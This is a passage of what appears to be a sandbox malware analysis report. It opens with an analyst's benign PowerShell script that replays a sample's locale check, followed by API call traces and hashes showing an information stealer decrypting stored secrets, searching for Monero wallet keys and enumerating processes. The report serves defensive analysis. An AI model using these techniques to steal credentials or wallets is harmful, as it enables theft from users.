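The API chain above (GetKeyboardLayoutList called once with a zero-length buffer for the count, LocalAlloc, GetKeyboardLayoutList again to fill the list, then GetLocaleInfoA with LCType 0x2, which is LOCALE_SLANGUAGE, and a 0x200-byte buffer, then LocalFree) is the keyboard-layout and locale enumeration behind the report's "may stop execution after checking locale" signature. The PowerShell below is an added example, not part of the Joe Sandbox report or of the sample, that reproduces the same Win32 call sequence on an analysis host so an operator can see exactly which language names such a check would observe on that VM. It assumes the sample derives the LCID it passes to GetLocaleInfoA from the low word (LANGID) of each HKL; the report shows that argument only as "?", so that mapping is an assumption. Which language names the sample then compares against is not visible in this report, so the script lists what the APIs return and makes no verdict.

```powershell
# Added example (not from the report or the sample): reproduce the
# GetKeyboardLayoutList -> GetLocaleInfoA chain to see what a locale-checking
# sample observes on this host. Run in Windows PowerShell on the analysis VM.

Add-Type -Namespace Win32 -Name Native -MemberDefinition @'
[DllImport("user32.dll", SetLastError = true)]
public static extern int GetKeyboardLayoutList(int nBuff, [Out] IntPtr[] lpList);

[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int GetLocaleInfoA(uint Locale, uint LCType,
                                        System.Text.StringBuilder lpLCData, int cchData);
'@

$LOCALE_SLANGUAGE = 0x2      # LCType value seen in the report: localized language name
$BufferChars      = 0x200    # cchData value seen in the report

function Get-ObservedKeyboardLanguages {
    # First call with nBuff = 0 only returns the number of installed layouts,
    # mirroring the sample's first GetKeyboardLayoutList(0, 0) call.
    $count = [Win32.Native]::GetKeyboardLayoutList(0, $null)
    if ($count -le 0) { return @() }

    # Second call fills the list (the sample used LocalAlloc for this buffer).
    $layouts = New-Object IntPtr[] $count
    $null = [Win32.Native]::GetKeyboardLayoutList($count, $layouts)

    foreach ($hkl in $layouts) {
        # Assumption: the LCID handed to GetLocaleInfoA is the LANGID in the
        # low word of the HKL; the report does not show that argument.
        $langId = [uint32]($hkl.ToInt64() -band 0xFFFF)

        $sb  = New-Object System.Text.StringBuilder $BufferChars
        $len = [Win32.Native]::GetLocaleInfoA($langId, $LOCALE_SLANGUAGE, $sb, $BufferChars)
        if ($len -gt 0) { $language = $sb.ToString() } else { $language = '<GetLocaleInfoA failed>' }

        [pscustomobject]@{
            HKL      = '0x{0:X8}' -f ($hkl.ToInt64() -band 0xFFFFFFFF)
            LangID   = '0x{0:X4}' -f $langId
            Language = $language
        }
    }
}

Get-ObservedKeyboardLanguages | Format-Table -AutoSize
```

Run it on the sandbox VM that produced the report and compare the Language column with the locale the VM is meant to present; if the only layout installed is the one the operator expects, the sample's locale check can only have seen that name, which is the fact an analyst needs when deciding whether this branch caused an early exit during detonation.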
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 6Dn$@\yn$Jh]w$N&c~$XKyw$`*$rQ[~
                                          • API String ID: 0-3100525379
                                          • Opcode ID: 9daa84c6957aa03a3894493383cdfacc4a4e3538cc82f1acfe29e5bea62886f1
                                          • Instruction ID: f5f7334600a7729e9ca1c4ad61745d47486f436be3b694a835552efdbc646f77
                                          • Opcode Fuzzy Hash: 9daa84c6957aa03a3894493383cdfacc4a4e3538cc82f1acfe29e5bea62886f1
                                          • Instruction Fuzzy Hash: 6FB218F360C204AFE3046E2DEC8567ABBE9EFD4320F1A463DEAC4D7744E63558058696
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: #[{e$,7$F}i$[&[^$[Gxi$`zo$E<=
                                          • API String ID: 0-2321347174
                                          • Opcode ID: d24b7794374d8e7c2f2a2bab7f7b5036c6e7cf17cae37b88dab63f37aeda2ff3
                                          • Instruction ID: 17bf3c6a76d148b49350a142d91b02fd3056dbe7db52b739828b0de4f056f1e8
                                          • Opcode Fuzzy Hash: d24b7794374d8e7c2f2a2bab7f7b5036c6e7cf17cae37b88dab63f37aeda2ff3
                                          • Instruction Fuzzy Hash: B0B24CF3A082049FD3046E2DEC8567ABBEAEFD4720F1A463DE6C4C3744E63599058697
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: A[7$HrF$Y]R$dS<$uno$x0~+$]_
                                          • API String ID: 0-2758577009
                                          • Opcode ID: a62fa7c93c1bf3fa1f66ce0d690d9b902163d3166579c5ae3ff1ff38b01b513a
                                          • Instruction ID: 426c78917b4fde4378d1b50f29201ddd9305dab940e46d0f491e5320c90ee063
                                          • Opcode Fuzzy Hash: a62fa7c93c1bf3fa1f66ce0d690d9b902163d3166579c5ae3ff1ff38b01b513a
                                          • Instruction Fuzzy Hash: 4BA2F3F3A08204AFE304AE2DEC4567AFBE9EF94720F16493DEAC4C3744E63558158796
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00EB0D73), ref: 00E9E4A2
                                          • StrCmpCA.SHLWAPI(?,00EB14F8), ref: 00E9E4F2
                                          • StrCmpCA.SHLWAPI(?,00EB14FC), ref: 00E9E508
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00E9EBDF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                          • String ID: \*.*
                                          • API String ID: 433455689-1173974218
                                          • Opcode ID: c3c9a5830cf1a9d1e777357eb89aba4427a12a84fe51c1f329da6b17b82c01b4
                                          • Instruction ID: 83f0d6501a4e94dc8c3aa66b6e8d9f16228fcc66153ee4fe5108cc30d28a5f47
                                          • Opcode Fuzzy Hash: c3c9a5830cf1a9d1e777357eb89aba4427a12a84fe51c1f329da6b17b82c01b4
                                          • Instruction Fuzzy Hash: C81243329002149BDB58FB60DC96AEE73B8AF59300F4551B9B50B7A091EF347F49CB92
                                          APIs
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E99AEF
                                          • LocalAlloc.KERNEL32(00000040,?,?,?,00E94EEE,00000000,?), ref: 00E99B01
                                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E99B2A
                                          • LocalFree.KERNEL32(?,?,?,?,00E94EEE,00000000,?), ref: 00E99B3F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BinaryCryptLocalString$AllocFree
                                          • String ID: N
                                          • API String ID: 4291131564-1689755984
                                          • Opcode ID: ce46f0d5f83c08442e6d6e4abf1f3ce9920f233ce315a8c0f1c50c60d012efff
                                          • Instruction ID: f0fd4fe1876822d96b0ec056f8fe434d41e0f54b7619f05d40f778b1219f0586
                                          • Opcode Fuzzy Hash: ce46f0d5f83c08442e6d6e4abf1f3ce9920f233ce315a8c0f1c50c60d012efff
                                          • Instruction Fuzzy Hash: 5411A2B4241208EFEB10CF64D895FAA77B5FB89B04F208058FD159B384C7B6A901CB94
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: @lD;$Nn_$R7t$c3v$k7{
                                          • API String ID: 0-668877412
                                          • Opcode ID: d729d990d8223e15973b43603de6d42c3dcdae0e56936b4fb683eda6a3afec2e
                                          • Instruction ID: a92fc7e049b888226cd6001afa2cbc44b5dd10b107f274401877c0235466a7ac
                                          • Opcode Fuzzy Hash: d729d990d8223e15973b43603de6d42c3dcdae0e56936b4fb683eda6a3afec2e
                                          • Instruction Fuzzy Hash: 8BB2E5F360C2049FE304AE2DEC8567ABBE5EF94720F16893DE6C4C7744EA3598058697
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: NRwj$Wd6c$g4;$g4;$n<{
                                          • API String ID: 0-213262960
                                          • Opcode ID: 1cc6c72b39bbf0c6415d31146ca4e5e3625c0a6e70b9c2a56031aed362136b7d
                                          • Instruction ID: 5ed464542c56806909ffdbbb4ccbe01a6e2fd4ca84942111d9e3333d38ead5f7
                                          • Opcode Fuzzy Hash: 1cc6c72b39bbf0c6415d31146ca4e5e3625c0a6e70b9c2a56031aed362136b7d
                                          • Instruction Fuzzy Hash: 6CB2E5F39082049FE304AE2DDC8567AFBE9EF94320F16493DEAC5C3744EA3599058697
                                          APIs
                                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E9C871
                                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E9C87C
                                          • lstrcat.KERNEL32(?,00EB0B46), ref: 00E9C943
                                          • lstrcat.KERNEL32(?,00EB0B47), ref: 00E9C957
                                          • lstrcat.KERNEL32(?,00EB0B4E), ref: 00E9C978
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$BinaryCryptStringlstrlen
                                          • String ID:
                                          • API String ID: 189259977-0
                                          • Opcode ID: ebe77e53720192accedce73e317ce857c6c88f54f051b0be721b429045c2cfae
                                          • Instruction ID: ab4ffe60a7d4db05a607eb8d356921442f0046dba9d4dbd3ef2d9d70f4a1bcd9
                                          • Opcode Fuzzy Hash: ebe77e53720192accedce73e317ce857c6c88f54f051b0be721b429045c2cfae
                                          • Instruction Fuzzy Hash: 87417F75A0421ADFDB10DF94DD89BEFB7B8BB88304F1041A8E909B7280D7755A84CF91
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E9724D
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00E97254
                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E97281
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00E972A4
                                          • LocalFree.KERNEL32(?), ref: 00E972AE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                          • String ID:
                                          • API String ID: 2609814428-0
                                          • Opcode ID: 3964cfe8a6421d7aadd6a77f66bef605b343678a7d81cbe77b3704a62e802fd3
                                          • Instruction ID: ab871ec6e242cce298e682b84531c58151a895b2a592058b376bdfddb407f80e
                                          • Opcode Fuzzy Hash: 3964cfe8a6421d7aadd6a77f66bef605b343678a7d81cbe77b3704a62e802fd3
                                          • Instruction Fuzzy Hash: 6C010CB5B41208FBEB20DFD4CD4AF9E77B8AB44B04F104154FB45BB2C4D6B5AA018B65
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EA961E
                                          • Process32First.KERNEL32(00EB0ACA,00000128), ref: 00EA9632
                                          • Process32Next.KERNEL32(00EB0ACA,00000128), ref: 00EA9647
                                          • StrCmpCA.SHLWAPI(?,00000000), ref: 00EA965C
                                          • CloseHandle.KERNEL32(00EB0ACA), ref: 00EA967A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: 77fd580ba242cb1b35466940c166e0592d5638c44283c4f6e93460521f106422
                                          • Instruction ID: 64eebb157980174a0e03a1c9703ebfe14fa00c579cdb341b039535bd98e5e292
                                          • Opcode Fuzzy Hash: 77fd580ba242cb1b35466940c166e0592d5638c44283c4f6e93460521f106422
                                          • Instruction Fuzzy Hash: 90011E75A01208EBCB24DFA5C949BEEB7F8FF4C300F104188A946A7240DB79AB44DF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: \Ck$~(__$V^i$p=7
                                          • API String ID: 0-3830310955
                                          • Opcode ID: 7451656a09fb527fa2470bec95868deda58bbedb2eda7f0a92fbc429de82b191
                                          • Instruction ID: f902c3dbe1089b3f9917050eab93af422ec548aeaf82b47592ca562ade33de6c
                                          • Opcode Fuzzy Hash: 7451656a09fb527fa2470bec95868deda58bbedb2eda7f0a92fbc429de82b191
                                          • Instruction Fuzzy Hash: E0B22AF3A0C3049FE3046E2DEC8567ABBE5EB94720F1A853DEAC5C3744E63558058697
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 6:yd$A'w$avy{$cB_5
                                          • API String ID: 0-3698643419
                                          • Opcode ID: bc9f6d101ef9d847d2f46e080798118a988d11864953ba40f65e5efb73b7a5c2
                                          • Instruction ID: 4a3f69fdad67bc84f4a07aca13bb4ff5f1cc5555db2a485cde6e8eaecc3711cd
                                          • Opcode Fuzzy Hash: bc9f6d101ef9d847d2f46e080798118a988d11864953ba40f65e5efb73b7a5c2
                                          • Instruction Fuzzy Hash: 78B228F3A0C204AFE3046E2DEC8567ABBE5EFD4720F16893DEAC483744E63558148697
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: /!~v$1h$k~?$~i
                                          • API String ID: 0-3587686430
                                          • Opcode ID: 9361c487c8b714edd57992b6db1da2b6bac8e871e6b2b7aed9cf34cfee7b3c7f
                                          • Instruction ID: 4a2c79f69d30b4e44fc4e1967f5bc6690a9ec2943da10e9665026e921a6b6d2b
                                          • Opcode Fuzzy Hash: 9361c487c8b714edd57992b6db1da2b6bac8e871e6b2b7aed9cf34cfee7b3c7f
                                          • Instruction Fuzzy Hash: C8B206F3A0C2049FE304AE2DEC4567ABBE5EF94720F1A492DEAC5C7744E63598048797
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: .q$8@}7$;y_$C@.
                                          • API String ID: 0-439953366
                                          • Opcode ID: bc84d4f6ec674297bddc4f501f541ff1ad0aa413b069c8e17e7e4a80e887685a
                                          • Instruction ID: 41df264b21ae9d9380cf4fb659b6c4c4048893ee3d11950ff6dbf3187bcca493
                                          • Opcode Fuzzy Hash: bc84d4f6ec674297bddc4f501f541ff1ad0aa413b069c8e17e7e4a80e887685a
                                          • Instruction Fuzzy Hash: 86B2E6F360C2049FE3046E2DEC8577ABBE9EF94720F1A493DEAC4C7744EA3558058696
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00EB05B7), ref: 00EA86CA
                                          • Process32First.KERNEL32(?,00000128), ref: 00EA86DE
                                          • Process32Next.KERNEL32(?,00000128), ref: 00EA86F3
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • CloseHandle.KERNEL32(?), ref: 00EA8761
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                          • String ID:
                                          • API String ID: 1066202413-0
                                          • Opcode ID: 147c703fb462a554056447fa7714758cfca3a3ce809607c365e53793c8108103
                                          • Instruction ID: 30187c8b16837fdd927353d686a3452b2a511bc12135e9a6141fa2a56672fd90
                                          • Opcode Fuzzy Hash: 147c703fb462a554056447fa7714758cfca3a3ce809607c365e53793c8108103
                                          • Instruction Fuzzy Hash: D9314B71901218EBCB68DF54DC45FEEB7B8EB4A700F1051AAF50ABA190DB347A45CFA1
                                          APIs
                                          • CryptBinaryToStringA.CRYPT32(00000000,00E95184,40000001,00000000,00000000,?,00E95184), ref: 00EA8EC0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: BinaryCryptString
                                          • String ID:
                                          • API String ID: 80407269-0
                                          • Opcode ID: d8ae073219b4f7dbacc430225eb8de1eaa3bc3813d9d06ee6833aee38eec3a47
                                          • Instruction ID: 29ecc60fa1111aa87901a832d7ef614b78f253f9e9d63dd278156d9338de7a47
                                          • Opcode Fuzzy Hash: d8ae073219b4f7dbacc430225eb8de1eaa3bc3813d9d06ee6833aee38eec3a47
                                          • Instruction Fuzzy Hash: 6411DF74200209EFDB04CFA4E985AAA37A9AB8A314F10A448FD199B240EB35B841DB60
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00EB0E00,00000000,?), ref: 00EA79B0
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA79B7
                                          • GetLocalTime.KERNEL32(?,?,?,?,?,00EB0E00,00000000,?), ref: 00EA79C4
                                          • wsprintfA.USER32 ref: 00EA79F3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                                          • String ID:
                                          • API String ID: 377395780-0
                                          • Opcode ID: 940b6bd5134805ce1420501ec1ebfbfa74b8f8d624a24e498fd96b475f6fdb63
                                          • Instruction ID: 910988b605e9634a1f01c620fa146efc2aedf463e489d2b4a35bf89b1a93aa33
                                          • Opcode Fuzzy Hash: 940b6bd5134805ce1420501ec1ebfbfa74b8f8d624a24e498fd96b475f6fdb63
                                          • Instruction Fuzzy Hash: 6B1118B2A04118EACB14DFC9D945BBEB7F8EB4CB11F10411AFA45A2284D2395940C7B0
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00BBF368,00000000,?,00EB0E10,00000000,?,00000000,00000000), ref: 00EA7A63
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA7A6A
                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00BBF368,00000000,?,00EB0E10,00000000,?,00000000,00000000,?), ref: 00EA7A7D
                                          • wsprintfA.USER32 ref: 00EA7AB7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                          • String ID:
                                          • API String ID: 3317088062-0
                                          • Opcode ID: 0d04cf1127004c473777090fa7133790945858eeae40df95b349bb23329a9b32
                                          • Instruction ID: 5663b8283a9b9bc171ecd07f4c9606610c3716002a237a317ee7153003e4d31b
                                          • Opcode Fuzzy Hash: 0d04cf1127004c473777090fa7133790945858eeae40df95b349bb23329a9b32
                                          • Instruction Fuzzy Hash: 2B1182B1A46228EBDB20CF54DC45F9AB778FB05721F104395E906A72C0C7792E40CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: B r$S0l$$v;
                                          • API String ID: 0-4052388050
                                          • Opcode ID: 1dca273c1c4aab5554af464f4eff3398b1b304f03e68ca3ce5b65b36a792fc8a
                                          • Instruction ID: 171a6da25626e9e8e0f6f7b3f956e2eddc4fe44dadba039e65a50937dca6aea9
                                          • Opcode Fuzzy Hash: 1dca273c1c4aab5554af464f4eff3398b1b304f03e68ca3ce5b65b36a792fc8a
                                          • Instruction Fuzzy Hash: 94B2E7F360C204AFE304AE2DEC8567ABBE9EF94720F1A453DE6C4C7744E63598058696
                                          APIs
                                          • CoCreateInstance.COMBASE(00EAE118,00000000,00000001,00EAE108,00000000), ref: 00EA3758
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00EA37B0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharCreateInstanceMultiWide
                                          • String ID:
                                          • API String ID: 123533781-0
                                          • Opcode ID: cfa89f57cc27bc489f89598d536cedb6feb088a55a6f65056ba462d9f43ce28c
                                          • Instruction ID: 8d07c3ff0eab151b75f6a6b6e40e9c49a988fe182ce5b504481d34afd8356f78
                                          • Opcode Fuzzy Hash: cfa89f57cc27bc489f89598d536cedb6feb088a55a6f65056ba462d9f43ce28c
                                          • Instruction Fuzzy Hash: 9641F870A00A289FDB24DB58CC95B9BB7B5BB49702F4051D8F609EB2D0D7716E85CF50
                                          APIs
                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E99B84
                                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E99BA3
